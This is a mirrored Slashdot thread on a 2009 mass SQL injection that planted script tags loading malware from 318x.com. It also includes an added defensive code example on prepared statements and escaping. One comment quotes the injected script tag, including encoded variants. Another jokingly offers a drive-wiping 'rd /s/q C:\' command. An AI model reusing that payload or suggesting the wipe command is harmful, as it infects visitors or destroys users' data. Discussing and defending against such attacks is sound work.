Slashdot Mirror


SQL Injection Attack Claims 132,000+

An anonymous reader writes "A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009."


  1. Windoze by jDeepbeep · · Score: 1, Informative

    Doesn't say what systems are affected by this SQL Injection.

    All I can tell (from TFA), is it affects Windows servers.

    1. Re:Windoze by TheNinjaroach · · Score: 5, Informative

      All I can tell (from TFA), is it affects Windows servers.

      SQL injection attacks affect any number of platforms. It's not a Windows problem, it's not a database problem, it's a "we hired cheap, unskilled developers" problem.

      Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.

      --
      I went to eat some animal crackers and the box said, "Do not eat if seal is broken." I opened the box and sure enough..
    2. Re:Windoze by jDeepbeep · · Score: 2, Informative

      Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.

      Yeah. I saw my error after I had posted it, so I tried to correct it with a follow up.

    3. Re:Windoze by Anonymous Coward · · Score: 1, Informative

      True, but the flash exploit is available on anything with flash it looks like (not updated, of course), so the only thing saving Linux/Mac/Sun users is lack of interest on the part of the malware writers.

    4. Re:Windoze by TheLink · · Score: 1, Informative

      Only easy when using sane languages.

      But it used to be very difficult to do the right thing with PHP.

      The PHP developers were either incompetent or malicious. Evidence: they created insane stuff like addslashes, magic_quotes and even mysql_real_escape_string.

      See: http://php.net/manual/en/function.mysql-real-escape-string.php

      Fortunately they eventually introduced stuff like PDO (but there was some confusion in the days of PEAR::DB).

      And we didn't get stuff like "mysql_definitely_the_real_escape_string_now_no_really" ;).

      But why didn't they just copy other people and introduce stuff like PDO right at the start?

  2. The real problem by Anonymous Coward · · Score: 2, Informative

    So it's MS and Adobe vulnerabilities that actually let the malware onto your system.
    FTA:

    Observed exploits include:

            * Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
            * MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
            * Microsoft Office Web Components vulnerabilities described in MS09-043
            * Microsoft video ActiveX vulnerability described in MS09-032
            * Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002.

  3. Obvious, but needs to be said by GreenTom · · Score: 4, Informative

    Add to windows\system32\drivers\etc\hosts:

    127.0.0.1 318x.com

    And you should be safe, for the moment.

  4. Re:318x.com by NeverVotedBush · · Score: 2, Informative

    318x.com is now in my hosts file. Can at least try to protect ourselves...

  5. Re:How is SQL involved? by Anonymous Coward · · Score: 1, Informative

    How the hell is this +1 informative? If you comprehended (step 2, after read) the article, you would understand that you have listed the client-side exploits that the payload delivered by the SQL injection. You have not addressed the grandparent, who CLEARLY (as in, in the title AND single line of content) requested more information regarding host profiles that may have been affected by the SQL injection itself.

  6. Re:How is SQL involved? by Gary+van+der+Merwe · · Score: 2, Informative

    On the server end there is a SQL injection exploit being used to get the malicious code out there.

    My point being that you don't need to do a SQL injection to do this.

    To prevent a SQL injection, you need to change ' to '' on input from the user that you pass to sql.

    To prevent a HTML+script injection, you need to change < to &lt;, > to &gt;, & to &amp; etc. on input from the user that renders to the browser. The sites in question are not doing this, hence, just stick the code you wish to inject into a comment or some other user field. This has nothing to do with SQL.

  7. Re:Details? by necrogram · · Score: 2, Informative

    They didn't mention it because it doesn't matter. It's the result of bad coding practices. A SQL injection attack is caused by the front end application accepting whatever input it's given and using it to generate the SQL statements. You stop these attacks by sanitizing your input, using stored procedures to do the database work, and possibly sticking in a middleware tier to handle database access, i.e. apache -> websphere -> database.

  8. Re:why don't these go away? by wowbagger · · Score: 2, Informative

    You must be new here, let me welcome you to "The Internet". I hope you enjoy your visit.

    Hosting companies don't give a pair of fetid dingo's kidneys about such matters, so long as the people responsible for the hosting pay good money.

    Even the hosting companies that claim to be anti-spam, and whose acceptable use policies state that ANY support of spam, including hosting spamvertized web sites, is prohibited, when confronted with multiple, on-going violations, will ignore all reports, remove all forum posts calling attention to those posts, and continue to cash the checks from the spammers.

  9. Re:Let's say it all together now... by Vellmont · · Score: 3, Informative


    validate your SQL inputs before posting them against an Internet-facing database.

    Or simply use prepared statements (or whatever the equivalent term is in your language of choice). Prepared statements are far safer and easier than trying to validate all the current and future potential for breaking out of a SQL statement. It won't protect you from people putting their own parameters into your SQL statement (like say someone else's userID), but that's a different class of vulnerability.

    --
    AccountKiller
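Comments 6 and 9 above describe two fixes for the server side (doubling quotes by hand, or using prepared statements) and one for the browser side (entity-encoding user text). The following is an added example, not code from the thread, from ScanSafe, or from any affected site; the in-memory table and the author name are constructed sample data.

```python
import html
import sqlite3

# Constructed sample data (not from the article): a tiny forum table with
# one comment from an author whose name contains an apostrophe.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (author TEXT, body TEXT)")
    conn.execute("INSERT INTO comments VALUES ('O''Brien', 'first post')")
    conn.commit()
    return conn

def find_by_author_unsafe(conn, author):
    # String concatenation: the user's text becomes part of the SQL itself,
    # so a quote in the input changes the statement's structure. With the
    # name O'Brien this raises sqlite3.OperationalError (a syntax error);
    # other inputs would change what the query does instead of breaking it.
    sql = "SELECT body FROM comments WHERE author = '" + author + "'"
    return [row[0] for row in conn.execute(sql)]

def find_by_author_doubled(conn, author):
    # The fix proposed in comment 6: double every single quote by hand.
    # Correct for this case, but it must be repeated at every call site and
    # knows nothing about any other quoting rules a given database may have.
    quoted = author.replace("'", "''")
    sql = "SELECT body FROM comments WHERE author = '" + quoted + "'"
    return [row[0] for row in conn.execute(sql)]

def find_by_author_prepared(conn, author):
    # Prepared statement (comment 9): the SQL text is fixed and the value is
    # bound separately, so the driver never parses user input as SQL.
    rows = conn.execute("SELECT body FROM comments WHERE author = ?", (author,))
    return [row[0] for row in rows]

def render_comment(body):
    # Output encoding for the browser side: <, >, &, and quotes become
    # entities, so a stored "<script src=...>" is shown as text, not run.
    return "<p>" + html.escape(body, quote=True) + "</p>"
```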
  10. Re:AV Detection by REggert · · Score: 2, Informative

    according to TFA:

    Malware description

    Threatname: Backdoor.Win32.Buzus.croo

    Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).

    That's the trojan that's being installed by the exploits served up by the injected IFRAME. It is not the vulnerability that is allowing the IFRAME to be injected to begin with.

    --

    cp /dev/zero ~/signature.txt

  11. Re:Details? by HangingChad · · Score: 2, Informative

    They didn't mention it because it doesn't matter. It's the result of bad coding practices.

    It does too matter. You don't infect 132,000 web sites with separate injection attacks. That's automated. A lot of the people running forums and CMS-driven web sites don't understand the code well enough to fix anything.

    Heck, one of my sites was hacked once, through the forum software. I'm not in the habit of combing through forum code looking for unvalidated inputs. So if someone could mention what the parent exploit is, what versions of that software are affected and whether the operating system OS makes a difference, then those same webmasters could make sure their software was up to date. This article describes the client exploit. I don't care about that, surf with Windows and that's going to happen. I do care that crap isn't originating with any of my web sites.

    --
    That's our life, the big wheel of shit. - The Fat Man, Blue Tango Salvage
  12. Re:SQL injection portability by butlerm · · Score: 2, Informative

    For various reasons, an SQL injection generally targets a specific application running on a specific database. Unless your database interface is seriously deficient, like MS SQL server, it is difficult to perform a successful SQL injection without knowing what the table structure is. And of course, most applications do not run on multiple database types.

  13. Re:hey by shutdown+-p+now · · Score: 2, Informative

    That one is outdated. What he needs is "rd /s/q C:\".

  14. Re:Probably the Asprox botnet. by jbezorg · · Score: 2, Informative

    I concur. Searching for the iframe script, this is what I found. Sorry if I can't say if it's something like dotnet nuke. The occasional coldfusion page also has me wondering.

    From the first page of a google search for "<script src=http://318x.com></script>":

    City of Iowa City<script src=http://318x.com></script> - How to ...
    Microsoft VBScript runtime error '800a000d'. Type mismatch: '[string: "1035<script src=http"]'. /default/templates/top2.asp, line 60.
    www.icgov.org/default/?id=1787

    www.icgov.org:80
    GET / HTTP/1.1

    HTTP/1.1 400 Bad Request
    Server: Microsoft-IIS/5.0
    Date: Thu, 10 Dec 2009 20:29:42 GMT
    Connection: close
    Content-Length: 4009
    Content-Type: text/html

    YEMEN TIMES : Education
    Opportunities<script src=http://318x.com></script> Letters<script src=http://318x.com></script> Archive<script src=http://318x.com></script> ...
    www.yementimes.com/DEFAULTSUB.ASPX?pnc=57&pnm... - Cached

    IWCS - Learning<script src=http://318%78.com></script><script src ...
    Membership<script src=http://318%78.com></script><script src=http://318x.%63om></script> IWCS Shared Channels<script src=http://318%78.com></script><script ...
    www.iwcs.com/category.cfm?Category=2932

    --
    I've lost all my marbles except one & It's fun to test angular & centripetal acceleration in my skull